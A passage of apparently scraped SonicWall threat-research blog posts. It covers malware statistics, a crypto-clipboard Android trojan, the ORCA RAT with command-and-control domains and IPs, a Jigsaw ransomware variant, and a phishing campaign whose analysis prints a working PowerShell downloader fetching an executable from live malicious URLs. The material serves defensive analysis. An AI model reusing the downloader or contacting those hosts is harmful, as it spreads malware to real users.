January 2019 Cyber Threat Data: New Year, New Malware Attack Variants

/1 Comment/in /by

With the headlines dominated by massive data leaks, you’d be forgiven for thinking that malware attacks have increased exponentially. But SonicWall’s latest figures for January 2019 are currently showing that malware numbers overall trended down for the month.

Globally, the SonicWall Capture Threat Network, which includes more than 1 million sensors across the world, recorded the following attack data in January 2019:

  • 715.8 million malware attacks (31 percent decrease compared to January 2018)
  • 345.3 billion intrusion attempts (12 percent increase)
  • 19 million ransomware attacks (49 percent decrease)
  • 341,196 encrypted threats (32 percent increase)
  • 31,188 new attack variants (102 percent increase)

In addition, in January 2019 the average SonicWall customer faced:

  • 1,700 malware attacks (31 percent decrease from January 2018)
  • 820,273 intrusion attempts (12 percent increase)
  • 45 ransomware attacks (49 percent decrease)
  • 156 encrypted threats (9 percent increase)
  • 18 phishing attacks each day (21 percent increase)

Malware Volume Down, Attack Variants Up

Just because global malware volume is down in January 2019, you shouldn’t be fooled into thinking that new tactics aren’t being tested and optimized.

New Attacks Variants Growing

In January 2019, the SonicWall Capture ATP cloud sandbox service identified 1,006 new attack variants per day.

While the number of malware attacks is down from last year, there has been a huge jump in the past 12 months in new attack variants. In fact, the SonicWall Capture Advanced Threat Protection (ATP) sandbox service identified 31,188 new attack variants in January — a 102 percent increase of this time last year. This averages to more than 1,006 new attack variants discovered, logged and blocked for customers each day.

SonicWall Capture Security Center

SonicWall cyber threat intelligence is available in the SonicWall Security Center, which provides a graphical view of the worldwide attacks over the last 24 hours, countries being attacked and geographic attack origins. This view illustrates the pace and speed of the cyber arms race.

The resource provides actionable cyber threat intelligence to help organizations identify the types of attacks they need to be concerned about so they can design and test their security posture ensure their networks, data, applications and customers are properly protected.

Android crypto clipper monitors the clipboard of its victims

/in /by

Cryptocurrency mining malware gained prominence in the last few years, we have seen a number of crypto-related infections on the Android platform. The malware writers are not sitting still with just crypto-miners, they have something new that yet again aims at stealing cryptocurrency from the victims and keeping it for themselves.

SonicWall Threats Research team observed reports of a new type of cryptocurrency related Android malware, this sample monitors the clipboard and switches relevant crypto-related content with that of the attacker and ultimately aims as sending crypto to the attacker’s accounts.

Infection Cycle

This malware requests for the following permissions during installation:

  • android.permission.ACCESS_NETWORK_STATE’
  • android.permission.INTERNET’
  • android.permission.WRITE_EXTERNAL_STORAGE’

Upon execution the malware appears to be legitimate but in reality the application performs a dangerous operation in the background.

In the background, this malware monitors the clipboard service on an infected device and copies contents of the clipboard considering the following conditions:

  • If the first character of the data copied to the clipboard is 1 or 3 and the length of the data copied is 34
  • If first two characters of the data copied to the clipboard are 0x and the length of the data copied is 42

 

Interestingly these two criteria match the format for Bitcoin (Btc) and Ethereum (Eth) wallet address formats.

The Switch

Since Cryptocurrency wallet addresses are long alphanumeric characters it is most likely that a user will copy his/her wallet address while using it. In a scenario where the user copies their wallet address to send money to it, the malware will slip the hard-coded address belonging to the attacker and complete the scam.

We tried copying dummy Ethereum and BitCoin wallet addresses on websites online and whenever we copied an address and pasted it later, before pasting it the address changed to the one configured in the malicious app:

Background Communication

Important content entered in the malicious app is copied and sent to the attacker, the image below shows the passwords we used to create a new vault were copied by the malware:

 

The malware communicates with the attacker via Telegram api:

 

Overall this is a sneaky Android malware that cleverly switches the wallet number of the victim with that of an attacker in the background. This continues to show malware writer’s interest in Cryptocurrency and their continued efforts to scam victims and make money for themselves.

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: AndroidOS.CryptoClipper.CPM (Trojan)

Indicators Of Compromise (IOC):

  • com.lemon.metamask – 24d7783aaf34884677a601d487473f88

Microsoft Security Bulletin Coverage for February 2019

/in /by

SonicWall Capture Labs Threat Research Team has analyzed and addressed Microsoft’s security advisories for the month of February 2019. A list of issues reported, along with SonicWall coverage information are as follows:

CVE-2019-0540 Microsoft Office Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2019-0590 Scripting Engine Memory Corruption Vulnerability
IPS 14016:Scripting Engine Memory Corruption Vulnerability (FEB 19) 4
CVE-2019-0591 Scripting Engine Memory Corruption Vulnerability
IPS 14017:Scripting Engine Memory Corruption Vulnerability (FEB 19) 5
CVE-2019-0593 Scripting Engine Memory Corruption Vulnerability
IPS 13938:HTTP Client Shellcode Exploit 111
CVE-2019-0594 Microsoft SharePoint Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2019-0595 Jet Database Engine Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2019-0596 Jet Database Engine Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2019-0597 Jet Database Engine Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2019-0598 Jet Database Engine Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2019-0599 Jet Database Engine Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2019-0600 HID Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2019-0601 HID Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2019-0602 Windows GDI Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2019-0604 Microsoft SharePoint Remote Code Execution Vulnerability
IPS 14201:Microsoft SharePoint Remote Code Execution 4
CVE-2019-0605 Scripting Engine Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2019-0606 Internet Explorer Memory Corruption Vulnerability
IPS 14018:Internet Explorer Memory Corruption Vulnerability (FEB 19) 1
CVE-2019-0607 Scripting Engine Memory Corruption Vulnerability
IPS 14019:Scripting Engine Memory Corruption Vulnerability (FEB 19) 6
CVE-2019-0610 Scripting Engine Memory Corruption Vulnerability
IPS 14020:Scripting Engine Memory Corruption Vulnerability (FEB 19) 7
CVE-2019-0613 .NET Framework and Visual Studio Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2019-0615 Windows GDI Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2019-0616 Windows GDI Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2019-0618 GDI+ Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2019-0619 Windows GDI Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2019-0621 Windows Kernel Information Disclosure Vulnerability
ASPY5385:Malformed-File exe.MP.56
CVE-2019-0623 Win32k Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2019-0625 Jet Database Engine Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2019-0626 Windows DHCP Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2019-0627 Windows Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2019-0628 Win32k Information Disclosure Vulnerability
ASPY5386:Malformed-File exe.MP.57
CVE-2019-0630 Windows SMB Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2019-0631 Windows Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2019-0632 Windows Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2019-0633 Windows SMB Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2019-0634 Microsoft Edge Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2019-0635 Windows Hyper-V Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2019-0636 Windows Information Disclosure Vulnerability
ASPY5387:Malformed-File exe.MP.58
CVE-2019-0637 Windows Defender Firewall Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2019-0640 Scripting Engine Memory Corruption Vulnerability
IPS 14023:Scripting Engine Memory Corruption Vulnerability (FEB 19) 8
CVE-2019-0641 Microsoft Edge Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2019-0642 Scripting Engine Memory Corruption Vulnerability
IPS 14024:Scripting Engine Memory Corruption Vulnerability (FEB 19) 9
CVE-2019-0643 Microsoft Edge Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2019-0644 Scripting Engine Memory Corruption Vulnerability
IPS 14025:Scripting Engine Memory Corruption Vulnerability (FEB 19) 10
CVE-2019-0645 Microsoft Edge Memory Corruption Vulnerability
IPS 14027:Microsoft Edge Memory Corruption Vulnerability (FEB 19) 1
CVE-2019-0648 Scripting Engine Information Disclosure Vulnerability
IPS 14026:Scripting Engine Memory Corruption Vulnerability (FEB 19) 11
CVE-2019-0649 Scripting Engine Elevation of Privileged Vulnerability
There are no known exploits in the wild.
CVE-2019-0650 Microsoft Edge Memory Corruption Vulnerability
IPS 14028:Microsoft Edge Memory Corruption Vulnerability (FEB 19) 2
CVE-2019-0651 Scripting Engine Memory Corruption Vulnerability
IPS 14012:Scripting Engine Memory Corruption Vulnerability (FEB 19) 1
CVE-2019-0652 Scripting Engine Memory Corruption Vulnerability
IPS 14013:Scripting Engine Memory Corruption Vulnerability (FEB 19) 2
CVE-2019-0654 Microsoft Browser Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2019-0655 Scripting Engine Memory Corruption Vulnerability
IPS 14014:Scripting Engine Memory Corruption Vulnerability (FEB 19) 3
CVE-2019-0656 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2019-0657 .NET Framework and Visual Studio Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2019-0658 Scripting Engine Information Disclosure Vulnerability
IPS 14015:Scripting Engine Information Disclosure Vulnerability (FEB 19) 1
CVE-2019-0659 Windows Storage Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2019-0660 Windows GDI Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2019-0661 Windows Kernel Information Disclosure Vulnerability
ASPY5383:Malformed-File exe.MP.55
CVE-2019-0662 GDI+ Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2019-0664 Windows GDI Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2019-0668 Microsoft SharePoint Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2019-0669 Microsoft Excel Information Disclosure Vulnerability
ASPY5384:Malformed-File xls.MP.65
CVE-2019-0670 Microsoft SharePoint Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2019-0671 Microsoft Office Access Connectivity Engine Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2019-0672 Microsoft Office Access Connectivity Engine Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2019-0673 Microsoft Office Access Connectivity Engine Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2019-0674 Microsoft Office Access Connectivity Engine Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2019-0675 Microsoft Office Access Connectivity Engine Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2019-0676 Internet Explorer Information Disclosure Vulnerability
IPS 14021:Internet Explorer Information Disclosure Vulnerability (FEB 19) 1
CVE-2019-0686 Microsoft Exchange Server Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2019-0724 Microsoft Exchange Server Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2019-0728 Visual Studio Code Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2019-0729 Azure IoT Java SDK Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2019-0741 Azure IoT Java SDK Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2019-0742 Team Foundation Server Cross-site Scripting Vulnerability
There are no known exploits in the wild.
CVE-2019-0743 Team Foundation Server Cross-site Scripting Vulnerability
There are no known exploits in the wild.

Adobe Coverage

CVE-2019-7089
ASPY 5381 : Malformed-File pdf.MP.326
CVE-2019-7090
ASPY 5382 : Malformed-File swf.MP.599

7 Reasons to Upgrade to the Next Generation of SonicWall Email Security Appliances

/1 Comment/in /by

Email security is still a necessity — even as we race toward 2020. That’s because email remains one of the most effective attack vectors for cybercriminals.

In 2018 alone, SonicWall customers faced an average of 4,164 of phishing attacks. That’s far too great a risk to your business or enterprise to go unchecked.

Fortunately, SonicWall offers powerful email security appliances that defeat today’s most dangerous email attacks, including phishing, business email compromise (BEC) and ransomware. SonicWall Email Security appliances are ideal for organizations that require a dedicated and powerful on-premise solution.

Explore the top seven reasons to upgrade your existing SonicWall Email Security appliances to deliver high-performance, enterprise-grade email security for their business.

Boost UI Speed, Productivity

Do more. Faster. Increased RAM enables the latest SonicWall Email Security Appliances to provide a more seamless user experience with a faster and more responsive UI. This saves time and effort for administrators managing the email security for the organization.

Why upgrade: The new SonicWall Email Security appliances come with 8 GB (ES 5000), 16 GB (ES 7000) and 32 GB (ES 9000) RAM compared to 2 GB (ES 3300) and 4 GB (ES 4300 and ES 8300) RAM of legacy versions. This significantly improves the processing power and responsiveness of the appliances.

Process More Email Volume, Faster

Faster cores increase the speed and accuracy of processing inbound and outbound emails with lower latency. The 64-bit processors increase the computational power and the speed of these appliances compared to older 32-bit appliances. The 64-bit processors are designed to take advantage of the increased access to memory (i.e., higher RAM), improving the mail processing and UI responsiveness.

Why upgrade: The new appliances have 64-bit processors and improved CPUs that increase email filtering and email throughput capacities compared to legacy appliances.

Store More Files, Emails Locally

More onboard storage memory allows you to increase local storage of message logs, junk email and email backups right on the appliance.

Why upgrade: The New ES appliances have 500 GB (ES 5000), 1 TB (ES 7000) and 2 TB (ES 9000) of onboard storage memory compared to 250 GB and 750 GB storage on the old ES series.

Stop Advanced Email Attacks

As SonicWall continues to add advanced threat protection features like Capture ATP Attachment Sandboxing, Advanced URL Protection and more filtering engines, the new appliances provide optimum performance due to increased RAM and processing power.

Why upgrade: Upgrade to the latest hardware to ensure you stay up-to-date with critical firmware patches and updates, and take advantage of new features that stop targeted phishing attacks, email threats and ransomware.

Expand Email Security to Virtual Environments to Reduce Costs

Virtualizing your infrastructure provides many benefits, while significantly improving the cost-effectiveness and performance needed to protect against advanced email threats.

Why upgrade: Enhance scalability and flexibility by expanding virtual infrastructure (e.g., hard disk, RAM and core CPUs) with ease, or move to hosted email security and eliminate infrastructure needs. You can also minimize your upfront investment with low-cost, perpetual virtual appliance software licenses. This virtual approach also lowers ongoing hardware and infrastructure maintenance costs.

Use Cloud-based Service to Improve Security Resiliency, Availability

Avoid business-crippling email downtime, vastly improve Quality of Service (QoS) and workforce productivity.

Why upgrade: SonicWall Hosted Email Security delivers a high degree of business continuity and scalability while fulfilling aggressive SLAs. Hosted Email Security also includes email continuity that allows employees to send and receive email during planned and unplanned outages to mail servers.

Retain Hardware Support and Warranty

Delivering Email Security is a critical function of IT that keeps employees productive and reduces attack surface for cyber criminals.

For current users, it is imperative your secure email solution is covered with the right warranty and support services.

SonicWall ES 3300/4300/8300 series have entered Limited Retirement Mode (LRM) as of April 2018 and is approaching End of Life (EOL) on April 2020. New firmware starting with ES 9.2 were released only for 64-bit appliances. The ES 3300/4300/8300 series will not be supported beyond 04/01/2020 in case of any hardware or firmware issues.

Why upgrade: Every new version of firmware is packed with advanced features and capabilities. ES 9.2 is the current recommended firmware that provides Advanced URL Protection. ES 9.2 and above are only supported on ES 5000 series or 64-bit VA or 64-bit Windows Server.

About SonicWall Email Security Appliances

SonicWall’s hardened, Linux-based email security appliances defend against advanced email-borne threats such as ransomware, zero-day threats, spear-phishing and business email compromise.

The multi-layered secure email solution provides comprehensive inbound and outbound protection, and is available in a range of hardware appliance options that scale up to 10,000 users per appliance.

Quick Glance: SonicWall Email Security Appliances
Feature ES 3300 ES 4300 ES 8300 ES 5000 ES 7000 ES 9000
CPU Intel 2.0 Ghz Core 2 Duo 2.13 Ghz Xeon Quad Core Celeron G1820 Core i3-4330 Xeon E3-1275 v 3
RAM 2 GB 4 GB 4 Gb 8 GB 16 Gb 32 GB
Hard Disk 250 GB 2 x 250 GB 4 x 750 GB 500 GB 1 TB 2 TB
Processor 32-bit 32-bit 32-bit 64-bit 64-bit 64-bit
Appliance Status In LRM, EOS 4/1/2020 In LRM, EOS 4/1/2020 In LRM,
EOS
4/1/2020		 Active Active Active
Firmware Status Not Supported Not Supported Not Supported Full Support Full Support Full Support
Enhanced Anti-Phishing No No No Yes Yes Yes
Advanced URL Protection No No No Yes Yes Yes

Upgrade to SonicWall Email Security

Ready to upgrade to a SonicWall Email Security appliance? Contact your SecureFirst partner today to explore the options that match your business objectives. If you’re not sure who that is, contact SonicWall and we’ll put you in touch.

TALK TO SONICWALL

ORCA, Remote Access Trojan

/in /by

Overview:

The SonicWall Capture Labs Threat Research Team, recently discovered the “ORCA” remote access Trojan. ORCA, allows an attacker to manipulate various processes and services from the command line. The attacker can execute arbitrary commands allowing the capability to upload and download files along with various other tasks involving the file system.

The following IP addresses and DNS information are seen after the Trojan executes itself.

adda.lengendport.com
tsl.gettrials.com
auty.organiccrap.com

11.38.64.251
123.120.99.228
147.96.68.184
176.31.24.184
202.2.108.142
203.146.251.11
213.147.54.170
23.19.39.19
62.73.174.134
71.183.67.163
91.198.50.31

Static Information:

Encryption Routine & Key:

Inside Ida Pro, we can locate the following key information for how this Trojan was named. Inside function “401200” we see the following xor routine:

By using the byte array “byte_40A060” as a key to the xor routine. We can now decode the information:

  • 0x06 ^ 0x49 = 0x4f = O
  • 0x30 ^ 0x42 = 0x72 = r
  • 0x2E ^ 0x4D = 0x63 = c
  • 0x2D ^ 0x4C = 0x63 = a
  • 0x24 ^ 0x6F = 0x4B = K
  • 0x1D ^ 0x74 = 0x69 = i
  • 0x19 ^ 0x75 = 0x6C = l
  • 0x1F ^ 0x73 = 0x6C = l
  • 0x28 ^ 0x4D = 0x65 = e
  • 0x21 ^ 0x53 = 0x72 = r

String: “OrcaKiller”

The “OrcaKiller” Trojan calls the Windows Crypto API to generate a pseudo random number of around 6 bytes.
This random generated number concatenates itself to the string “OrcaKiller”. We now have “[6 bytes]OrcaKiller”.
With both parts of the generated string known. The Trojan now uses this information to encrypt other pieces of information.

Network Information

The following image shows the dns, header content and type along with the port number used by the Trojan

The Trojan looks for specific sets of HTML tags. The first set can be seen in the image below as “P” and the terminating tag “/P”. Once the Trojan has found the correct tags it drops in to the first command and control function. It then extracts the payload text between the HTML tags and runs it through the decryption routine. The same encryption key used above is used to decrypt the text. Once the payload text has been decrypted the Trojan treats this as a binary executable file, which is then written to the disk and executed.

Summary of Capabilities:

  • System/network information gathering
  • Keystroke logging
  • Screenshots
  • File upload/download/execute
  • Command shell

SonicWall Gateway AntiVirus, provides protection against this threat:

GAV: Orca.RAT_2 (Trojan)

Cyber Security News & Trends

/0 Comments/in /by

This week, SonicWall highlights how the UK is taking malware seriously, there is an investigation into new vehicles that are vulnerable to cyberattacks, and an update on the average price paid for ransomware.

SonicWall Spotlight

Bill Conner: How the UK Is Taking Malware Seriously – Information Age

  • SonicWall CEO Bill Conner was interviewed by Information Age editor Nick Ismail on the changing cybersecurity landscape, how malware can be region specific, the possibilities of cross-border collaboration, and more.

DCC Inks Distribution Deal With SonicWall

  • IT products distributor Drive Control Corporation (DCC) has been appointed as an official distributor for SonicWall in South Africa.

SMBs Need Layered Security to Defend Their Businesses – Forbes

  • Bill Conner, CEO of SonicWall, talks as part of the Forbes Technology Council on why small and medium businesses (SMBs) need layered cybersecurity. He argues that if you’re running an SMB online cybercriminals see you as an easy target and, without adequate investment in cyberdefenses, they might just be correct.

Cyber Security News

Is Your Car Hackable? Cybersecurity Experts Say It Might Be – USA Today

  • A modern car is full of small computers, but in a new survey of 15,900 IT security practitioners and engineers in the automotive industry, many acknowledged a huge number of flaws in the cybersecurity makeup of the vehicles. 62 percent of those surveyed say a malicious attack against automotive technologies is likely or very likely to occur in the next 12 months.

Trojan Malware: The Hidden Cyber Threat to Your PC – ZDNet

  • While Ransomware and cryptocurrency mining have been making the headlines recently, ZDNet investigates the quiet growth of Trojan malware – made possible by the huge number of recent breaches leading to targeted phishing emails.

Ransomware Victims Who Pay Cough up $6,733 (on Average) – BankInfoSecurity

  • A new report has found that in the fourth quarter of 2018 ransomware victims who paid the ransom spent, on average, $6.73; an increase of 13 percent from the previous quarter. Unsurprisingly Bitcoin is the preferred method of payment.

Two Hacker Groups Responsible for 60 Percent of All Publicly Reported Hacks – ZDNet

  • Blockchain analysis firm Chainalysis investigated publicly reported cryptocurrency exchange hacks and concluded that 60 percent could be traced back to two hacking groups.

True Crime: SamSam Ransomware I Am – SC Magazine

  • SamSam may not be the worst malware out there but its impact on enterprise cybersecurity became difficult to ignore in 2018. SC Magazine traces the history of the malware throughout the year.

Report: Nation-State Malware Attack Could Cripple US – BankInfoSecurity

  • A new report has concluded that without improved private and public data co-operation, the US is at risk of being crippled by well-made malware. The report recommends closer technical data sharing and action taken to improve communication between public and private entities.

A Hacker’s Take on Blockchain Security – Forbes

  • With Blockchain seen by some as the solution to cybersecurity problems, Forbes asks a black hat hacker to investigate with them just how true that is. They come across some less obvious stumbling blocks in blockchain security.

In Case You Missed It

Ransomware: "I'm not a Jigsaw variant!"

/in /by

Since we have first reported seeing Jigsaw Ransomware back in 2016, we have seen several spinoffs of this ransomware. And because its source code can easily be downloaded from the world wide web we have reported variants we’ve seen like the Zapre ransomware here and  was even possibly used here to teach ethical hacking.

This week the Sonicwall Capture Labs Research team has seen yet another Jigsaw ransomware variant but who’s writer shamelessly denying its just another variant. In its ransom note it addresses security researchers and says  “My dear researchers, I’m not a Jigsaw variant!!!!”

Infection Cycle:

This ransomware arrives as a seemingly harmless setup file using the following icon and file properties.

Once executed it creates the following directories using  the number “0” to name Micr0soft and Wind0ws folders and drops a copy of itself:

  • %APPDATA%\Local\MICR0SOFT\dllhost.exe
  • %APPDATA%\Roaming\WIND0WS\svchost.exe

It then encrypts all files with the following file extensions:


.jpg, .jpeg, .raw, .tif, .gif, .png, .bmp, .3dm, .max, .accdb, .db, .dbf, .mdb, .pdb, .sdf, .sql.dwg, .dxf.c, .cpp, .cs, .h, .php, .asp, .rb, .java, .jar, .class, .py, .js.aaf, .aep, .aepx, .plb, .prel, .prproj, .aet, .ppj, .psd, .indd, .indl, .indt, .indb, .inx, .idml, .pmd, .xqx, .xqx, .ai, .eps, .ps, .svg, .swf, .fla, .as3, .as.txt, .doc, .dot, .docx, .docm, .dotx, .dotm, .docb, .rtf, .wpd, .wps, .msg, .pdf, .xls, .xlt, .xlm, .xlsx, .xlsm, .xltx, .xltm, .xlsb, .xla, .xlam, .xll, .xlw, .ppt, .pot, .pps, .pptx, .pptm, .potx, .potm, .ppam, .ppsx, .ppsm, .sldx, .sldm.wav, .mp3, .aif, .iff, .m3u, .m4u, .mid, .mpa, .wma, .ra, .avi, .mov, .mp4, .3gp, .mpeg, .3g2, .asf, .asx, .flv, .mpg, .wmv, .vob, .m3u8, .mkv.dat, .csv, .efx, .sdf, .vcf, .xml, .ses.rar, .zip, .zipx, .7zip

It creates a list of all encrypted files into a txt file and saves it into the following directory:

  • %APPDATA%\Roaming\MICR0SOFT_FILES\EncryptedFileList.txt

It appends “.pennywise” extension to all encrypted files.

Upon successful encryption it launches this ransom note window.

The ransom note just tells the victim that their files are now encrypted and that files will then be deleted after non-compliance but did not provide any clear instructions on how victims can get their files back. And after reminding security researchers that this is not another Jigsaw ransomware variant, it then starts a  countdown before it deletes one file after every hour.

However, further analysis revealed that the decryption key was easily found in its strings – “PsTqQNhR77oKJXvBWE3YZc”.

Copying this key into the decryption key box will start decrypting all the files. It also deletes all copies of itself and thus cleaning up the infected machine.

Because of the prevalence of these types of malware attacks, we urge our users to back up their files regularly.

SonicWALL Capture Labs provides protection against this threat via the following signature:

  • GAV: Jigsaw.RSM_26 (Trojan)

New Phishing campaign targets Bank of America Merrill Lynch customers

/in /by

SonicWall has recently spotted a new Bank of America phishing campaign. The scam email claims to come from Bank of America Merrill Lynch, however the email includes a malicious Excel attachment. The Excel document has VBA macros, which when enabled, downloads and runs a malicious payload Win32.Trojan.

Infection Cycle:

Phishing email is the most effective attack vector, as exploit kits are no longer the preferred attack mode for hackers. In this phishing campaign, Bank of America Merrill Lynch customers are being targeted with a custom attack. All these fake emails come from the domain ‘bofamail.com’ not the real ‘bankofamerica.com’. The sender in these emails pretends to be a real employee from Bank of America as we see an online profile in the same name working in the southern California branch. However the Newport branch address and phone number doesn’t match.

Upon launching the excel attachment, a prompt appears with the message –  “If you have problems viewing/loading document content please select “Enable Editing” and then “Enable Content” button”. Once enabled, the macro downloads a malicious payload and the payload gets into action immediately.

The VBA code is locked by password.

After unlocking the VBA project by tweaking the binary, we see the form (shown below) with encoded value in its fields.

VBA code:

VBA code is highly obfuscated to avoid static detection through signatures. It has the logic to retrieve the shell code from the above form.


Shell Code:

The shell code that’s retrieved is pasted below. It has gzip compressed and base64 encoded string.

PowerShell:

After applying decompression and base64 decoding on the above shell code, we get the below function that downloads the malicious payload either from hxxp://gba-llp.ca/za.liva or ‘hxxp://jamaicabeachpolice.com/za.liva’

function <#release#> tisel([string] $stri1)
{
 $tos1=1;
 try{
  (new-object system.net.webclient <#exim#> ).downloadfile($stri1,$env:temp+'\tmp0281.exe');
 }
 catch{
  $tos1=0;
 }
return $tos1;
}

$men1=@('gba-llp.ca/za.liva','jamaicabeachpolice.com/za.liva');
foreach ($rix in $men1)
{
if(tisel('http://'+$rix) -eq 1){
break;
}
};

Hence upon enabling VB macro in the Excel document, shell command gets executed which then invokes Fileless PowerShell script to download and execute the malicious file.

The payload exhibits the following behaviors

  • Stops and deletes the Windows Defender service
  • Sets up Task Scheduler to run for every 10 minutes
  • Injects itself into the whitelisted process ‘svchost.exe’
  • Communicates with the C&C server periodically

Threat Graph:

Sonicwall Capture Labs Threat Research team provides protection against this with the following signatures:

  • GAV: Downloader.HWB (Trojan)
  • GAV: MalAgent.H_13330 (Trojan)

Hashes:

Email:
fed01a32dab1e3ab1eba4b2bfa542219a63b0777608717ad0ba5c5e0c66ec928
336cc2145bc27105906023089264593dcf9ddc99bb4a61af6760920efa97a6f4
f5e923ee210a88c6f02eac9c66ec116e49c964b6e6402124ed02462c69f46e0f
d0582f03ea259bc4d33aa77942b7a4d4ce8163e022ede4dcea9c81d802910321

Excel:
f22c2f747d77d57c14f6e81433691bd1b79f0fde1e111b4c4a90aac278b23654

Payload:
32c58040d3d6ec5305a1a0ebb48ba05aebe3ac2f905a7f152f32fc9170e16711

Payload Url:
http://gba-llp.ca/za.liva
http://jamaicabeachpolice.com/za.liva

Bill Conner: How the UK Is Taking Malware Seriously

/1 Comment/in /by

Bill Conner sat down with Information Age editor Nick Ismail to discuss global malware attack statistics, cross-border cybersecurity collaboration, the increasing need to inspect PDFs and Microsoft Office documents, and how all impact the dynamic U.K. political landscape.

Though malware attack data shows an increase in global attacks, the U.K. has experienced a decrease in these attacks following the WannaCry ransomware strain in previous years.

Conner sees this as a positive change for the U.K. and stated via Information Age, “you guys were all over it” following the WannaCry attack and “most of the vendors in the U.K. and their customers put solutions in place to protect against multiple family variants of ransomware.”

While this is a positive change for the U.K., there is still work to be done globally and Conner says regardless of the often divided political climate, “there’s a good foundation for cyber collaboration across borders.”

“Right now, we need to focus on those PDFs and Office (files), the things you run in your business every day, because they can be exploited for IP and monetary gain. And you can’t even see it.”

Bill Conner
SonicWall President & CEO

In addition to urging governments to look toward political collaboration to tighten cybersecurity globally, Conner explained the majority of this change will come through the dedication of law enforcement.

“Law enforcement sharing is better than political sharing at the moment,” Conner told Information Age. “Public institutions, private organizations and different governments have got to collaborate. But, above all, we’ve got to have dedicated cyber law enforcement.”

While a global cybersecurity strategy may be down the road, Conner says there are places to focus on now to best secure governments, enterprises and SMBs.

What does Conner recommend an organization focus their cybersecurity strategy on?

“What I’m telling governments and enterprises is to forget side-channel exploits for the moment,” he said. “Right now, we need to focus on those PDFs and Office (files), the things you run in your business every day.”

One of the ways to mitigate these specific malware threats requires advanced technology, like SonicWall Capture Advanced Threat Protection (ATP) with SonicWall Real-Time Deep Memory Inspection (RTDMI™), to inspect and mitigate attacks in memory.

Read the rest of Conner’s recommendations and predictions in his interview with Information Age.

Network Security for K-12 School District Simplified with Powerful Firewall, Failover Capabilities

/1 Comment/in /by

The Goffstown School District in New Hampshire supports nearly 4,000 students and staff. And one person oversees it all.

Running the IT department for an entire K-12 school district sounds like a challenge that few would take, but Goffstown School District IT director Gary Girolimon makes it look easy. Clearly, this is the result of years of experience and having sound networking tools available.

If the number of users doesn’t bother you, consider that all seven Goffstown School District buildings are part of a high-speed 10 Gbs dark fiber wide-area network (WAN). At any given part of the day, students can be downloading massive amounts of dangerous files, or stumbling upon harmful content that violates compliance regulations.

So, how do they handle that level of network complexity?

Girolimon, pictured, deployed a SonicWall SuperMassive 9200 high-end firewall at the perimeter of his network. On it, he runs the SonicWall Comprehensive Gateway Security Suite, including content filtering to support CIPA compliance, which helps him manage the bandwidth to demanding applications and block harmful sites. The district also uses SonicWall Analyzer for real-time web traffic reporting.

“SonicWall gives us an integrated, cost-effective solution for our organization’s security needs,” said Girolimon. “It’s easy to administer, with a flexible UI, and the solution is super reliable. We have had no downtime attributable to our SonicWall firewall.”

Prior to deploying the SuperMassive at the edge, Girolimon deployed smaller SonicWall firewalls, ranging from NSA 2400s to 3600s, at each distributed building location. Those firewalls now provide failover service in case a dark fiber link to the network hub goes down, thereby extending their life and usefulness.

“SonicWall gives us an integrated, cost-effective solution for our organization’s security needs. It’s easy to administer, with a flexible UI, and the solution is super reliable.”

Gary Girolimon
IT Director
Goffstown School District

This flexibility and performance have allowed Girolimon to create a DMZ and bring servers in-house for better local access and to provide specific employees remote access to network assets — all with the confidence they are secure and protected.

By maintaining a single, primary firewall appliance with a failover firewall available as needed, Girolimon greatly simplified administration of firewall rules, app policies and VPN permissions. Integrated content filtering and VPN has simplified CIPA compliance.

Cost-Effective Network Security for K-12 School Districts

Today, more than 3,000 districts and schools rely on SonicWall to deliver secure remote and network access with school firewalls that enable educational institutions to realize the promise of technologically-savvy learning environments, in the classroom or while students are mobile.

LEARN MORE